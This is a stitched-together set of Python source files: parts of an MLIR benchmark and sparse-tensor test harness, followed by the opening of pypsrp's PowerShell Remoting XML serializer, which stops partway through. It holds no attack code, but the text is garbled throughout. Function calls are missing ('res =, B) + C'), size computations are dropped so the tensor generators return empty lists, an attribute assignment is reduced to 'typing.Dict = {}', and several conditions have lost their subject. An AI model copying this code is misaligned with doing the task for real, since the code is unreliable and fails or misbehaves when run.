N], [N], [M, N], ] def gflop_count_builder(self, sizes: Mapping[str, Any]) -> float: """GFlop builder function. Given a mapping between dimension names / op attributes and their numeric values, return the number of GFlops computed. """ M, N, K = sizes["M"], sizes["N"], sizes["K"] return float(2.0 * M * N * K + M * N) / float(1e9) def gbyte_count_builder(self, sizes: Mapping[str, Any], types: Sequence[np.dtype]) -> float: """GByte builder function. Given a mapping between dimension names / op attributes and their numeric values, and a list of data types, return the number of GBytes read or written. """ M, N, K = sizes["M"], sizes["N"], sizes["K"] lhs_np_type, rhs_np_type, acc_np_type, res_np_type = types return float(M * K * np.dtype(lhs_np_type).itemsize + K * N * np.dtype(rhs_np_type).itemsize + N * np.dtype(acc_np_type).itemsize + M * N * np.dtype(res_np_type).itemsize) / float(1e9) def tensors_np_builder(self, sizes: Mapping[str, Any], types: Sequence[np.dtype]) -> List[np.dtype]: """NumPy tensors building function. Given a mapping between dimension names / op attributes and their numeric values, and a list of NumPy elemental types, return constructed NP values of shapes given by `shape_builder` and specified elemental types. """ shapes = self.shapes_builder(sizes) tensors = [ realign(np.random.rand(*s).astype(t), byte_alignment=64) for s, t in zip(shapes, types) ] tensors[len(tensors) - 1].fill(0.) return tensors def check_np(self, A: np.dtype, B: np.dtype, C: np.dtype, D: np.dtype) -> None: """NumPy checking function. Given a list of NumPy values, check the precomputed results matches those of the expected reference implementation. """ res =, B) + C if not np.allclose(D, res): delta = D - res max_abs_delta = max(delta.max(), delta.min(), key=abs) raise Exception(f"max_abs_delta: {max_abs_delta} -> FAILURE ") def types_mlir_builder(self, sizes: Mapping[str, Any], types: Sequence[Type]) -> List[Type]: """MLIR types builder. Given a mapping between dimension names / op attributes and their numeric values, and a list of elemental MLIR types, return MLIR tensor types of the shape expected by the function. """ shapes = self.shapes_builder(sizes) return [RankedTensorType.get(s, t) for s, t in \ zip(shapes, list(types) + [types[-1]])] def build_problem_under_context_manager( self, name: str, types: Sequence[Type], zero_at_each_iteration: bool) -> builtin.FuncOp: """MLIR problem builder. Given a list of MLIR shaped types, build and return the MLIR FuncOp that implements the desired computation on those types. """ global avx512 # Actual benchmarked function called under entry_point_name. bench = builtin.FuncOp(name, (types, [types[-1]])) # TODO: need something much more flexible to add function argument attributes. attach_inplaceable_attributes(bench, inplaceable=[False, False, False, True]) attach_passthrough( bench, [StringAttr.get(os.getenv('SANDBOX_INLINING', 'noinline'))], avx512=avx512) acc_type = types[-2].element_type with InsertionPoint(bench.add_entry_block()): tensor_zero = bench.arguments[3] if zero_at_each_iteration: zero = arith.ConstantOp(types[-1].element_type, 0.0) tensor_zero = linalg.FillOp(output=tensor_zero, value=zero) matmul = linalg.matmul(bench.arguments[0], bench.arguments[1], outs=[tensor_zero]) bias_add = add_bias_to_2d(matmul, bench.arguments[2], outs=[bench.arguments[3]]) # linalg.matmul returns a Value instead of OpView, so we have to manually # wrap it in a list here. func.ReturnOp([bias_add]) return bench ``` #### File: examples/sparse/ ```python from enum import Enum import dataclasses from typing import Any, Callable, List, Optional, Tuple import argparse import ctypes import itertools import logging import numpy as np import os import random # Import MLIR related modules. from mlir import execution_engine as ee from mlir import ir from mlir import runtime from mlir.dialects import builtin from mlir.dialects import func from mlir.dialects import sparse_tensor as st from mlir.dialects.linalg.opdsl import lang as dsl # Import compilation utilties for the tests. from ..core import experts # Message to print out when tests stop with failure. FAILURE_MESSAGE = "FAILURE" # Generate a non-zero every 5 values to achieve 20% density. _STEP_FOR_NON_ZERO_VALUES = 5 # The non-zero values used by the generator, if not provided by the tests. _DEFAULT_NON_ZERO_VALUES = (1, 2, 3, 4, 5) # A plane has two dimensions. _RANK_FOR_PLANE = 2 # A default seed to initialize random state. _DEFAULT_SEED = 5 # The name for the environment variable that provides the full path for the # supporting library. _SUPPORTLIB_ENV_VAR = "SUPPORTLIB" # The default supporting library if the environment variable is not provided. _DEFAULT_SUPPORTLIB = "" # The JIT compiler optimization level. _OPT_LEVEL = 2 # The entry point to the JIT compiled program. _ENTRY_NAME = "main" # TODO(b/195340661): Add bitwidth 8. # Bitwidths for pointer and indices. _SUPPORTED_BIT_WIDTHS = (0, 16, 32, 64) # Sparse codegen parallelization options. _SUPPORTED_PARALLELIZATION_OPTIONS = (0, 1, 2, 3, 4) # Sparse codegen vector lengths. _SUPPORTED_VECTOR_LENGTHS = (1, 16, 64) # Available sparsity values for each tensor dimension. _SUPPORTED_SPARSITY_VALUES = (st.DimLevelType.dense, st.DimLevelType.compressed) # Alias for annotating the type for the function object used to invoke the # compiler. CompilerType = Callable[ [ir.Module, Callable[[str, List[st.EncodingAttr]], str]], ir.Module] class _Scheme(Enum): """Schemes for generating non-zero values for sparse input tensors. * `DOT`: A scheme for generating non-zero values as scattered dots. * `PLANE`: A scheme for generating non-zero values in hyperplanes. """ DOT = 0 PLANE = 1 class TDType(Enum): """ The data types being tested.""" # TODO(b/195340661): Add int8. I16 = np.int16 I32 = np.int32 I64 = np.int64 # numpy _ctype_from_dtype_scalar can't handle float16 yet. F32 = np.float32 F64 = np.float64 def mlir_type_from_td_type(td_type: TDType) -> ir.Type: """Returns the MLIR type that corresponds to the given test descr type.""" tdtype_to_irtype = { TDType.I16: ir.IntegerType.get_signless(16), TDType.I32: ir.IntegerType.get_signless(32), TDType.I64: ir.IntegerType.get_signless(64), TDType.F32: ir.F32Type.get(), TDType.F64: ir.F64Type.get() } return tdtype_to_irtype[td_type] # Supported integer types. _SUPPORTED_INT_TYPES = (TDType.I16, TDType.I32, TDType.I64) # Supported floating point types. _SUPPORTED_FP_TYPES = (TDType.F32, TDType.F64) def _generate_tensor_dot(shape: List[int], values: Tuple[int, ...], first_nonzero_pos: int) -> List[int]: """Generates a tensor with non-zero values as scattered dots.""" num_elements = num_generated = 0 num_available = len(values) data = [] for i in range(num_elements): if (i % _STEP_FOR_NON_ZERO_VALUES) == first_nonzero_pos: data.append(values[num_generated % num_available]) num_generated += 1 else: data.append(0) return data def _generate_tensor_plane(shape: List[int], values: Tuple[int, ...], first_nonzero_pos: int) -> List[int]: """Generates a tensor with non-zero values on planes.""" plane_shape = shape[-_RANK_FOR_PLANE:] other_shape = shape[:-_RANK_FOR_PLANE] num_plane_elements = num_other_elements = num_generated = 0 num_available = len(values) data = [] for j in range(num_other_elements): for i in range(num_plane_elements): if (i % _STEP_FOR_NON_ZERO_VALUES) == first_nonzero_pos: data.append(values[num_generated % num_available]) num_generated += 1 else: data.append(0) return data def generate_tensor(shape: List[int], scheme: Optional[_Scheme] = None, values: Optional[Tuple[int, ...]] = None, seed: int = _DEFAULT_SEED) -> List[int]: """Generates values for a sparse input tensor. Args: shape: A list of integers, representing the dimensions of the input tensor. scheme: An Enum value of _Scheme, representing the scheme to be used. If a scheme is not provided, a scheme is chosen randomly. values: A tuple of integers used cyclically as the non-zero values for generating the sparse tensor. seed: An integer value to initialize the random number generator state. The random number generator is used to select a generation scheme when a scheme is not provided and to decide on the position of the first non-zero value. Returns: The sparse tensor value represented as a list of integers. """ random_state = np.random.RandomState(_DEFAULT_SEED) if len(shape) <= 2: # When rank <= 2, _Scheme.PLANE degenerates to _Scheme.DOT. scheme = _Scheme.DOT elif scheme is None: # If a scheme is not specified, randomly choose a scheme. scheme = _Scheme.PLANE if random_state.choice(2) else _Scheme.DOT values = values or _DEFAULT_NON_ZERO_VALUES # Generate a random value in range 0.._STEP_FOR_NON_ZERO_VALUES to randomdize # the position of the first non-zero value. first_nonzero_pos = random_state.choice(_STEP_FOR_NON_ZERO_VALUES) # Generate the data as a list of values. data = (_generate_tensor_dot(shape, values, first_nonzero_pos) if scheme == _Scheme.DOT else _generate_tensor_plane( shape, values, first_nonzero_pos)) return data @dataclasses.dataclass(frozen=True) class InputDesc: """Describing an input for the operation being tested. Attributes: ordering: A list of integers for the storage ordering of the input dimensions. sparsity: A list of DimLevelType for the sparsity of each input dimension. pointed_bw: An integer pointer bit width. index_bw: An integer index bit width. """ ordering: List[int] sparsity: List[st.DimLevelType] pointer_bw: int index_bw: int def __post_init__(self): if len(self.ordering) != len(self.sparsity): raise ValueError("Different lengths for ordering and sparsity: " + f"{len(self.ordering)} != {len(self.sparsity)}.") if sorted(self.ordering) != list(range(len(self.ordering))): raise ValueError("Problem with ordering: " + f"{str(self.ordering)} != " + f"permutation{str(list(range(len(self.ordering))))}.") def _ctype_pointer_from_array(array) -> ctypes.POINTER: """Returns the ctype pointer for the given numpy array.""" return ctypes.pointer( ctypes.pointer(runtime.get_ranked_memref_descriptor(array))) class TestDesc: """Describing a test for an opeartion. A test descriptor has the following properties: inputs: A read-only property to access the input affine expressions. outputs: A read-only property to access the output affine expressions. linalg_op: A writable property to access the linear algebra operation being test. """ # A TestDesc has the following attributes: # _name: The name of the test. # _iter_space: Represents the affine expression definition and the size for # each dimension in the iteration space. # _input_affines: The list of inputs. Each input for the operation being # tested is defined by a list of affine expression definition. # _input_tensors: The list of input tensors. Each input tensor is represented # as a list of integers. # _output: The output for the operation being tests, represented as a list of # affine expression definitions. # _linalg_op: The operation being tested. This is assigned after the object # is defined because the definition of linalg_op requires other fields in # the TestDesc object and we can't move the definition of _linalg_op to # TestDesc. # _ref_result: The reference result of the test, set up through method # calculate_reference_result. @property def inputs(self) -> List[List[dsl.AffineExprDef]]: """The input affine expressions.""" return self._input_affines def _get_dims_from_affine_expr( self, affine_exps: List[dsl.AffineExprDef]) -> List[int]: """Returns the dimensions for the affine expression.""" return [self._iter_space[exp] for exp in affine_exps] def _get_input_dims(self, index: int) -> List[int]: """Returns the dimension values for the given input.""" return self._get_dims_from_affine_expr(self.inputs[index]) def __init__(self, name: str, iter_space_exps: List[dsl.AffineExprDef], iter_space_sizes: List[int], output: List[dsl.AffineExprDef], *inputs: List[List[dsl.AffineExprDef]]): """Constructs a test descriptor. Args: name: The name of the test. iter_space_exps: A list of AffineExprDef, representing the affine expression definition for each dimension in the iteration space. iter_space_sizes: A list of integers, representing the size for each dimension in the iteration space. output: A list of AffineExprDef, representing the affine expression definition for each dimension in the output tensor. inputs: All the inputs for the operation being tested. Each input is represented by a list of AffineExprDef, representing the affine expression definition for each dimension in the input tensor. Raises: ValueError: When there is a problem with the inputs. The lengths of iter_space_exps and iter_space_sizes should equal. Affine expressions used by output/inputs should be defined in iter_space_exps. Values in iter_space_sizes should be larger than zero. """ if len(iter_space_exps) != len(iter_space_sizes): raise ValueError("Different lengths for iter_space_exps and " + "iter_space_size: " + f"{len(iter_space_exps)} != {len(iter_space_sizes)}.") if any(v <= 0 for v in iter_space_sizes): raise ValueError("iter_space_sizes contains values not larger than 0: " + f"{str(iter_space_sizes)}.") self._iter_space = dict(zip(iter_space_exps, iter_space_sizes)) self._linalg_op = None self._ref_result = None # Verify each affine expression in output. for affine in output: if affine not in self._iter_space: raise ValueError(f"Output affine expression {str(affine)}" + " not defined in the iteration space.") self._output = output self._name = name self._input_affines = [] self._input_tensors = [] for index, affines in enumerate(inputs): # Verify each affine expression in the input. for affine in affines: if affine not in self._iter_space: raise ValueError(f"Input affine expression {str(affine)}" + " not defined in the iteration space.") self._input_affines.append(affines) self._input_tensors.append(generate_tensor(self._get_input_dims(index))) @property def output(self) -> List[dsl.AffineExprDef]: """The output affine expressions.""" return self._output @property def linalg_op(self) -> dsl.LinalgOpDef: """The linear algebra operation being tested.""" return self._linalg_op @linalg_op.setter def linalg_op(self, op: Callable[..., dsl.DefinedOpCallable]) -> None: self._linalg_op = op def _get_num_inputs(self) -> int: """Returns the total number of inputs for the operation being tested.""" return len(self._input_affines) def _get_output_dims(self) -> List[int]: """Returns the dimension values for the output.""" return self._get_dims_from_affine_expr(self.output) def _get_inputs_for_type(self, type: TDType) -> List[np.ndarray]: """Returns a list of numpy array with the given type for the inputs.""" return [ np.array(v, dtype=type.value).reshape(self._get_dims_from_affine_expr(a)) for v, a in zip(self._input_tensors, self._input_affines) ] def _emit_main_function(self, callee_name: str, td_type: TDType, attrs: List[st.EncodingAttr]): """Emits the 'main' method to call the `callee_name` function. The function is emitted at the current insertion point, assumed to be within a module. This function contains the following: - Set up input tensors. - Call the callee function. - Return the result of the function call. Args: calee_name: The name of the function for the operation being tested. td_type: The data type used to run the operation being tested. attrs: A list of EncodingAttr, one for each input of the operation being tested. """ # Define the main function. mlir_type = mlir_type_from_td_type(td_type) num_inputs = self._get_num_inputs() input_types = [ ir.RankedTensorType.get(self._get_input_dims(i), mlir_type) for i in range(num_inputs) ] output_types = [ir.RankedTensorType.get(self._get_output_dims(), mlir_type)] main_func = builtin.FuncOp(_ENTRY_NAME, (input_types + output_types, output_types), visibility="public") main_func.attributes["llvm.emit_c_interface"] = ir.UnitAttr.get() # Convert the operands to sparse encodings, call the callee and return its # result. with ir.InsertionPoint(main_func.add_entry_block()): converted_tensors = [] for i, argument, encoding in zip(range(num_inputs), main_func.arguments, attrs): conversion = st.ConvertOp( ir.RankedTensorType.get(self._get_input_dims(i), mlir_type, encoding), argument) converted_tensors.append(conversion.dest) call = func.CallOp(output_types, ir.FlatSymbolRefAttr.get(callee_name), converted_tensors + [main_func.arguments[-1]]) func.ReturnOp(call.results) def _build_module_and_engine( self, compiler: CompilerType, type: TDType, attrs: List[st.EncodingAttr]) -> ee.ExecutionEngine: """Builds the program and the execution engine. Args: compiler: A Callable object for invoking the compiler. type: The data type for the operation being tested. attrs: A list of EncodingAttr, one for each input of the operation being tested. Returns: The execution engine that executes the JIT compiled operation. """ module = ir.Module.create() # Build the data types for the inputs and output. ir_type = mlir_type_from_td_type(type) inputs_output = [] for i in range(self._get_num_inputs()): inputs_output.append( ir.RankedTensorType.get(self._get_input_dims(i), ir_type, attrs[i])) inputs_output.append( ir.RankedTensorType.get(self._get_output_dims(), ir_type)) # Build the kernel for the linalg operation being tested. with ir.InsertionPoint(module.body): @builtin.FuncOp.from_py_func(*inputs_output) def linalg_funcop(*args): return self._linalg_op(*args[:-1], outs=[args[len(args) - 1]]) self._emit_main_function(linalg_funcop.__name__, type, attrs) # Invoke JIT compilation. compiled_module = compiler(_ENTRY_NAME, module) # We currently rely on an environment to pass in the full path for a # supporting library to overwrite the default supporting library. support_lib = os.getenv(_SUPPORTLIB_ENV_VAR, _DEFAULT_SUPPORTLIB) engine = ee.ExecutionEngine(compiled_module, opt_level=_OPT_LEVEL, shared_libs=[support_lib]) return engine def _compile_and_run(self, compiler: CompilerType, type: TDType, attrs: List[st.EncodingAttr], inputs: List[np.ndarray]) -> np.ndarray: """Compiles and executes the test. Args: compiler: A Callable object for invoking the compiler. attrs: A list of EncodingAttr, one for each input of the operation being tested. inputs: A list of numpy arrays for the input tensors. Returns: The output of the operation being test, represented as a numpy array. """ # Numpy arrays are accessed by MLIR computation via their ctype pointers. # Gather a list of ctype pointers for the numpy arrays. ctype_pointers = [] output_dims = self._get_output_dims() # Add the pointer for the output tensor. c_out = np.zeros(output_dims, type.value) ctype_pointers.append(_ctype_pointer_from_array(c_out)) # Add the pointers for the input tensors. for i in range(self._get_num_inputs()): ctype_pointers.append(_ctype_pointer_from_array(inputs[i])) # Add the pointer for the initial value of the output tensor. Currently, # the initial value and the output value have to be different. c_init = np.zeros(output_dims, type.value) ctype_pointers.append(_ctype_pointer_from_array(c_init)) # Invoke JIT compilation, then execute the compiled code. with ir.Context() as ctx, ir.Location.unknown(): engine = self._build_module_and_engine(compiler, type, attrs) engine.invoke(_ENTRY_NAME, *ctype_pointers) return runtime.ranked_memref_to_numpy(ctype_pointers[0][0]) def get_result(self, p: int, vl: int, type: TDType, input_descs: List[InputDesc]) -> np.ndarray: """Returns the result for the test for the given codegen parameters. Args: p: An integer representing the parallelization strategy. vl: An integer representing the vector length. type: The TDType for the result. input_descs: A list of InputDesc, representing dimension ordering and sparsity for the input tensors. Returns: The result produced by executing the compiled code. """ with ir.Context() as ctx: inputs = self._get_inputs_for_type(type) attrs = [] for desc in input_descs: perm = ir.AffineMap.get_permutation(desc.ordering) attr = st.EncodingAttr.get(desc.sparsity, perm, desc.pointer_bw, desc.index_bw) attrs.append(attr) v = 0 if vl == 1 else 1 # TODO(b/195340661): When vl is non-trivial, enumerates the options for # enable-simd-index32. si = False opt = (f"parallelization-strategy={p} " f"vectorization-strategy={v} vl={vl} " f"enable-simd-index32={si}") compiler = experts.ExpertSparseCompiler(options=opt) return self._compile_and_run(compiler, type, attrs, inputs) def calculate_reference_result(self, type: TDType) -> None: """Calculates the reference result for the test. Args: type: The data type used to run the operation to get the reference result. Returns: Uses a default set of codegen parameters to compile the test. Returns the result produced by executing the compiled code. """ with ir.Context() as ctx: input_descs = [] for i in range(self._get_num_inputs()): input_descs.append( InputDesc(list(range(len(self._input_affines[i]))), [st.DimLevelType.dense] * len(self._input_affines[i]), 0, 0)) self._ref_result = self.get_result(0, 1, type, input_descs) def get_reference_result(self, type: TDType) -> np.ndarray: """ Returns the reference result for the test. This routine assumes calculate_reference_result has been called to calculate the result and record the result in the attribute. Args: type: The data type for the output result. Returns: Converts the pre-calculated reference result to the desired data type and returns the result. Raises: ValueError: if calculate_reference_result is not called to make the reference result available. """ if self._ref_result is None: raise ValueError("Need to call calculate_reference_result to set up" + " the reference result.") return self._ref_result.astype(type.value) # Defines the annotation and codegen options used for the exhaustive tests. def sparsities2() -> List[Tuple[st.DimLevelType, st.DimLevelType]]: """Enumerates the sparsities for an input with rank 2.""" return itertools.product(_SUPPORTED_SPARSITY_VALUES, _SUPPORTED_SPARSITY_VALUES) def sparsities3( ) -> List[Tuple[st.DimLevelType, st.DimLevelType, st.DimLevelType]]: """Enumerates the sparsities for an input with rank 3.""" return itertools.product(_SUPPORTED_SPARSITY_VALUES, _SUPPORTED_SPARSITY_VALUES, _SUPPORTED_SPARSITY_VALUES) # TODO(b/195340661): Add a method to generate a permutation for range(n) to # support larger rank values. This will retire the use of the constant values. def orderings2() -> List[List[int]]: """Enumerates the storage orderings an input with rank 2.""" return [[0, 1], [1, 0]] # TODO(b/195340661): Add a method to generate a permutation for range(n) to # support larger rank values. This will retire the use of the constant values. def orderings3() -> List[List[int]]: """Enumerates the storage orderings for an input with rank 3.""" return [[0, 1, 2], [0, 2, 1], [1, 0, 2], [1, 2, 0], [2, 0, 1], [2, 1, 0]] # TODO(b/195340661): Add bitwidth 8. def bitwidths() -> Tuple[int, ...]: """Enumerates the bit widths to be tested.""" return _SUPPORTED_BIT_WIDTHS def pars() -> Tuple[int, ...]: """Enumerates the parallelization option values.""" return _SUPPORTED_PARALLELIZATION_OPTIONS def vls() -> Tuple[int, ...]: """Enumerates the vector length option values.""" return _SUPPORTED_VECTOR_LENGTHS def int_types() -> Tuple[TDType, ...]: """Enumerates the integer data types to be tested.""" return _SUPPORTED_INT_TYPES def fp_types() -> Tuple[TDType, ...]: """Enumerates the floating point data types to be tested.""" return _SUPPORTED_FP_TYPES def all_types() -> Tuple[TDType, ...]: """Enumerates all the data types to be tested.""" return _SUPPORTED_INT_TYPES + _SUPPORTED_FP_TYPES def supported_tensor_types(type: TDType, pw: int, iw: int): """ Checks whether the tensor type combination is supported. Args: type: A TDType enum for the data type of the tensor values. pw: The pointer bitwidth for the tensor storage representation. iw: The index bitwidth for the tensor storage representation. Returns: A boolean value to indicate whether the combination is supported (True) or not supported (False). """ # newSparseTensor only supports pw == iw for integer types. For int64, it only # supports pw == iw == 64. return (type not in _SUPPORTED_INT_TYPES) or (pw == iw and (type != TDType.I64 or pw == 64)) def _get_command_line_values() -> Tuple[int, int]: """Parses the command line and returns (num_processes, log_level).""" parser = argparse.ArgumentParser() parser.add_argument( "-num_processes", type=int, required=False, default=os.cpu_count(), help="the number of processes to run the test (default os.cpu_count())") parser.add_argument("-log", choices=["info", "error"], default="info", help="the logging level (default=info)"), args = parser.parse_args() levels = { "error": logging.ERROR, "info": logging.INFO, } return args.num_processes, levels[args.log] def _run_tests_sequential(parameter_combinations: Callable[[], Tuple[Any, ...]], run_test: Callable[..., bool]) -> bool: """Tests all combinations sequentially.""" return all(run_test(*c) for c in parameter_combinations()) def _run_tests_parallel(num_processes: int, parameter_combinations: Callable[[], Tuple[Any, ...]], run_test: Callable[..., bool]) -> bool: """Tests all combinations in parallel with the given number of processes.""" # Python multiprocessing doesn't work within Google. Import the Pool module # only when multiprocessing is enable for this reason. from multiprocessing import Pool with Pool(num_processes) as pool: # For each combination, assign a job to the worker pool and return a # placeholder object for getting the test result. We use `c` not `*c` here # as apply_async unpacks the tuple. result_objs = [ pool.apply_async(run_test, c) for c in parameter_combinations() ] # Get the results of the tests using the placeholder objects. return all(result.get() for result in result_objs) def run_tests_sequential_or_parallel(num_processes: int, parameter_combinations: Callable[[], Tuple[ Any, ...]], run_test: Callable[..., bool]) -> bool: """Runs the tests with the given number of processes. Args: num_processes: An integer for the number of processes used to run the tests. The tests are run in parallel when this value is larger than one. parameter_combinations: A Callable object for generating all the combinations of the parameter values used to invoke run_test. run_test: A Callable object for running a test with a given combination of parameter values. Returns: A boolean to indicate whether all tests pass (True) or there are failing tests (False). """ return (_run_tests_sequential(parameter_combinations, run_test) if num_processes <= 1 else _run_tests_parallel( num_processes, parameter_combinations, run_test)) def get_num_processes_and_run_tests(module_name: str, test_driver: Callable[[int], bool]) -> bool: """Determines the number of processes and invokes the test driver. The tests run differently in OSS vs in Google for two reasons. - In Google, we use a python script to load and execute the module that contains the tests to support the loading of the MLIR libraries. In OSS, we directly run the module that contains the tests. - Python multiprocessing works in OSS but doesn't work in Google. As such, we only enable the commandline parser and multiprocessing when the module is run directly. Args: module_name: The __name__ of the module that contains the tests, used to determine whether the module is run directly or not. test_driver: A callable object to run all tests in the module with the given number of processes. Returns: A boolean to indicate whether all tests pass (True) or there are failing tests (False). """ if module_name != "__main__": num_processes = 1 log_level = logging.INFO else: num_processes, log_level = _get_command_line_values() logging.basicConfig(level=log_level) return test_driver(num_processes) def test_combination_wrapper( test_combination: Callable[..., bool]) -> Callable[..., int]: """Wraps a test function with post processing functionality. In particular, the wrapper invokes test_combination, logs the test and its status, and returns a boolean to indicate the status of passing (True) or failing (False). Args: test_combination: A Callable object for invoking the test with one combination of the test parameters, and returns a boolean to indicate the status of passing (True) or failing (False). Returns: A wrapper of the given test_combination function. """ def wrapper(*args) -> int: passed = test_combination(*args) status_str = "passed" if passed else "failed" test_name = "_".join([str(i) for i in args])"test_{test_name} {status_str}.") return passed return wrapper ```
{ "source": "00mjk/pypsrp", "score": 2 }
#### File: src/pypsrp/ ```python import base64 import binascii import logging import re import typing import uuid import xml.etree.ElementTree as ET from copy import copy from queue import Empty, Queue from cryptography.hazmat.primitives.padding import PKCS7 from pypsrp._utils import to_bytes, to_string, to_unicode from pypsrp.complex_objects import ( ApartmentState, Color, CommandMetadataCount, CommandOrigin, ComplexObject, Coordinates, CultureInfo, DictionaryMeta, GenericComplexObject, HostMethodIdentifier, InformationalRecord, KeyInfoDotNet, ListMeta, ObjectMeta, ParameterMetadata, PipelineResultTypes, ProgressRecordType, PSCredential, PSThreadOptions, QueueMeta, RemoteStreamOptions, SessionStateEntryVisibility, Size, StackMeta, ) from pypsrp.exceptions import SerializationError from pypsrp.messages import ( DebugRecord, ErrorRecordMessage, InformationRecord, VerboseRecord, WarningRecord, ) log = logging.getLogger(__name__) class Serializer(object): def __init__(self) -> None: self.obj_id = 0 self.obj: typing.Dict = {} self.tn_id = 0 typing.Dict = {} self.cipher: typing.Any = None # Finds C0, C1 and surrogate pairs in a unicode string for us to # encode according to the PSRP rules self._serial_str = re.compile("[\u0000-\u001F\u007F-\u009F\U00010000-\U0010FFFF]") # to support surrogate UTF-16 pairs we need to use a UTF-16 regex # so we can replace the UTF-16 string representation with the actual # UTF-16 byte value and then decode that self._deserial_str = re.compile(b"\\x00_\\x00x([\\0\\w]{8})\\x00_") def serialize( self, value: typing.Any, metadata: typing.Optional[ObjectMeta] = None, parent: typing.Optional[ET.Element] = None, clear: bool = True, ) -> typing.Optional[ET.Element]: """ Serializes a raw value or class into an XML Element that can be sent over to the remote host. :param value: The value to serialize :param metadata: Any extra metadata to control how to serialize the value, if None then the value will be inferred by the type :param parent: Whether to append the element onto a parent element :param clear: Whether to clear the Obj and TN reference map, this should only be True when initially calling serialize :return: The XML Element from the serializied value """ if clear: self._clear() if isinstance(value, ET.Element): if metadata is not None and is not None: value.attrib["N"] = if parent is not None: parent.append(value) return value metadata = metadata or ObjectMeta() if metadata.tag == "*": if isinstance(value, TaggedValue): metadata.tag = value.tag value = value.value else: metadata.tag = self._get_tag_from_value(value) pack_function: typing.Callable[[ObjectMeta, typing.Any], ET.Element] = { # type: ignore[assignment] # Not sure why # primitive types "S": lambda m, d: self._serialize_string(d), "ToString": lambda d: self._serialize_string(d), "C": lambda m, d: str(ord(d)), "B": lambda m, d: str(d).lower(), "DT": lambda m, d: None, "TS": lambda m, d: str(d), "By": lambda m, d: str(d), "SB": lambda m, d: str(d), "U16": lambda m, d: str(d), "I16": lambda m, d: str(d), "U32": lambda m, d: str(d), "I32": lambda m, d: str(d), "U64": lambda m, d: str(d), "I64": lambda m, d: str(d), "Sg": lambda m, d: str(d), "Db": lambda m, d: str(d), "D": lambda m, d: str(d), "BA": lambda m, d: to_string(base64.b64encode(d)), "G": lambda m, d: str(d), "URI": lambda m, d: self._serialize_string(d), "Version": lambda m, d: str(d), "XD": lambda m, d: self._serialize_string(d), "SBK": lambda m, d: self._serialize_string(d), "SS": lambda m, d: self._serialize_secure_string(d), "Obj": self._serialize_obj, "ObjDynamic": self._serialize_dynamic_obj, "LST": self._serialize_lst, "IE": self._serialize_ie, "QUE": self._serialize_que, "STK": self._serialize_stk, "DCT": self._serialize_dct, }[ metadata.tag ] if value is None: if metadata.optional: return None element = ET.Element("Nil") else: element_value = pack_function(metadata, value) if isinstance(element_value, str): element = ET.Element(metadata.tag) element.text = element_value else: element = element_value if is not None: element.attrib["N"] = if parent is not None: parent.append(element) return element def deserialize( self, element: typing.Union[ET.Element, str], metadata: typing.Optional[ObjectMeta] = None, clear: bool = True, ) -> typing.Any: if clear: self._clear() if isinstance(element, str): element_string = element try: element = ET.fromstring(element) except ET.ParseError as err: log.warning("Failed to parse data '%s' as XML, return raw xml: %s" % (element_string, str(err))) return element_string else: xml_string = ET.tostring(element, encoding="utf-8", method="xml") element_string = to_string(xml_string) metadata = metadata or ObjectMeta() if metadata.tag == "*": metadata.tag = element.tag # get the object types so we store the TN Ref ids for later use obj_types = self._get_types_from_obj(element) # check if it is a primitive object unpack_function: typing.Optional[typing.Callable[[ET.Element], typing.Any]] = { # Primitive types "S": lambda d: self._deserialize_string(d.text), "ToString": lambda d: self._deserialize_string(d.text), "C": lambda d: chr(int(d.text)), "B": lambda d: d.text.lower() == "true", "DT": lambda d: d.text, "TS": lambda d: d.text, "By": lambda d: int(d.text), "SB": lambda d: int(d.text), "U16": lambda d: int(d.text), "I16": lambda d: int(d.text), "U32": lambda d: int(d.text), "I32": lambda d: int(d.text), "U64": lambda d: int(d.text), "I64": lambda d: int(d.text), "Sg": lambda d: float(d.text), "Db": lambda d: float(d.text), "D": lambda d: d.text, # TODO: deserialize this "BA": lambda d: base64.b64decode(d.text), "G": lambda d: uuid.UUID(d.text), "URI": lambda d: self._deserialize_string(d.text), "Nil": lambda d: None, "Version": lambda d: d.text, "XD": lambda d: self._deserialize_string(d.text), "SBK": lambda d: self._deserialize_string(d.text), "SS": lambda d: self._deserialize_secure_string(d), # references an object already deserialized "Ref": lambda d: self.obj[d.attrib["RefId"]], }.get(element.tag) if unpack_function is not None: return unpack_function(element) # not a primitive object, so try and decode the complex object if type(metadata) == ObjectMeta and metadata.object is None: structures = { "Selected.Microsoft.PowerShell.Commands.GenericMeasureInfo": ObjectMeta( "Obj", object=CommandMetadataCount ), "System.Array": ListMeta(), "System.Collections.ArrayList": ListMeta(), "System.Collections.Hashtable": DictionaryMeta(), "System.Collections.Generic.List": ListMeta(), "System.Collections.Queue": QueueMeta(), "System.Collections.Stack": StackMeta(), "System.ConsoleColor": ObjectMeta("Obj", object=Color), "System.Management.Automation.CommandOrigin": ObjectMeta("Obj", object=CommandOrigin), "System.Management.Automation.DebugRecord": ObjectMeta("Obj", object=DebugRecord), "System.Management.Automation.ErrorRecord": ObjectMeta("Obj", object=ErrorRecordMessage), "System.Management.Automation.Host.Coordinates": ObjectMeta("Obj", object=Coordinates), "System.Management.Automation.Host.KeyInfo": ObjectMeta("Obj", object=KeyInfoDotNet), "System.Management.Automation.Host.Size": ObjectMeta("Obj", object=Size), "System.Management.Automation.InformationalRecord": ObjectMeta("Obj", object=InformationalRecord), "System.Management.Automation.InformationRecord": ObjectMeta("Obj", object=InformationRecord), "System.Management.Automation.ParameterMetadata": ObjectMeta("Obj", object=ParameterMetadata), "System.Management.Automation.ProgressRecordType": ObjectMeta("Obj", object=ProgressRecordType), "System.Management.Automation.PSBoundParametersDictionary": DictionaryMeta(), "System.Management.Automation.PSCredential": ObjectMeta("Obj", object=PSCredential), "System.Management.Automation.PSObject": ObjectMeta("ObjDynamic", object=GenericComplexObject), "System.Management.Automation.PSPrimitiveDictionary": DictionaryMeta(), "System.Management.Automation.PSTypeName": ObjectMeta("S"), "System.Management.Automation.Remoting.RemoteHostMethodId": ObjectMeta( "Obj", object=HostMethodIdentifier ), "System.Management.Automation.Runspaces.ApartmentState": ObjectMeta("Obj", object=ApartmentState), "System.Management.Automation.Runspaces.PipelineResultTypes": ObjectMeta( "Obj", object=PipelineResultTypes ), "System.Management.Automation.Runspaces.PSThreadOptions": ObjectMeta("Obj", object=PSThreadOptions), "System.Management.Automation.Runspaces.RemoteStreamOptions": ObjectMeta( "Obj", object=RemoteStreamOptions ), "System.Management.Automation.SessionStateEntryVisibility": ObjectMeta( "Obj", object=SessionStateEntryVisibility ), "System.Management.Automation.VerboseRecord": ObjectMeta("Obj", object=VerboseRecord), "System.Management.Automation.WarningRecord": 